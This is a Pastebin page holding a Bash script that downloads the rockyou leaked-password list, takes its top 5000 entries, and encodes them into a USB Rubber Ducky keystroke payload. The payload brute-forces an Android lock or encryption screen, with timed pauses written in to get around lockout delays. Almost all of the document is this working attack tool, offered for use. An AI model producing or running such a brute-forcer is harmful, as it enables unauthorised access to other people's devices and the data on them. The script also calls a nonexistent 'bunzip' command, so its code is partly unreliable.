Advertisement
KhaosBringer

Android Brute Forcer Script

Apr 11th, 2020
669
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.07 KB | None | 0 0
  1. #Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 #passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.
  2. #####################################################################################################################################
  3.  
  4. #!/bin/bash
  5. clear
  6. echo -e "========================================================"
  7. echo -e " This script downloads the rockyou password list"
  8. echo -e " then takes the top 5000 passwords and generates"
  9. echo -e " an Android brute forcer."
  10. echo -e "========================================================"
  11. echo -e " You need to have duckencode.jar installed as well"
  12. echo -e " as bzip2 and wget."
  13. echo -e "========================================================"
  14. echo -e " This script is licensed under the GPLv3 and is"
  15. echo -e " currently maintained by James Luther (CaptainHooligan)"
  16. echo -e "========================================================"
  17. echo ""
  18. echo ""
  19. WHOAMI=`id | sed -e 's/(.*//'`
  20. if [ "$WHOAMI" != "uid=0" ] ; then
  21.      echo "Sorry, you need super user access to run this script."
  22.      exit 1
  23. fi
  24. echo -e "Verifying prerequisites are installed ... "
  25. echo ""
  26. duckdir=`find / -name duckencode.jar`
  27. if [ -z "$duckdir" ] ; then
  28. echo "Duckencode.jar not found on system. Please verify you have this installed."
  29. exit 1
  30. else
  31. echo "Duckencode.jar prerequisite met."
  32. fi
  33. duckinpath=`which duckencode.jar`
  34. if [ -z "$duckinpath" ] ; then
  35. PATH=$PATH:$duckdir
  36. fi
  37. bundir=`find / -name bzip2`
  38. if [ -z "$bundir" ] ; then
  39. echo "Bzip2 not found on system. Please verify you have this installed."
  40. exit 1
  41. else
  42. echo "Bzip2 prerequisite met."
  43. fi
  44. buninpath=`which bzip2`
  45. if [ -z "$buninpath" ] ; then
  46. PATH=$PATH:$bundir
  47. fi
  48. wgetdir=`find / -name wget`
  49. if [ -z "$wgetdir" ] ; then
  50. echo "Wget not found on system. Please verify you have this installed."
  51. exit 1
  52. else
  53. echo "Wget prerequisite met."
  54. fi
  55. wgetinpath=`which wget`
  56. if [ -z "$wgetinpath" ] ; then
  57. PATH=$PATH:$wgetdir
  58. fi
  59. echo ""
  60. echo ""
  61. #echo -e "Which do you want to attack?"
  62. #echo -e " 1. Encryption Screen"
  63. #echo -e " 2. Password Screen"
  64. #read answer
  65. #case answer
  66. # 1)
  67. echo -e "Verify connection to internet and press [Enter]."
  68. read
  69. echo ""
  70. echo ""
  71. echo -e "Downloading rockyou password list. This can take some time ..."
  72. echo ""
  73. echo ""
  74. wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
  75. bunzip rockyou.txt.bz2
  76. echo ""
  77. echo ""
  78. echo -e "Creating rock-android.txt file ... "
  79. echo ""
  80. echo ""
  81. echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
  82. echo -e "rock-android.txt created!"
  83. ls -lart rock-android.txt
  84. echo ""
  85. echo ""
  86. echo -e "Creating inject.bin file ... "
  87. java -jar duckencode.jar -i rock-android.txt
  88. echo ""
  89. echo ""
  90. echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
  91. ls -lart inject.bin
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement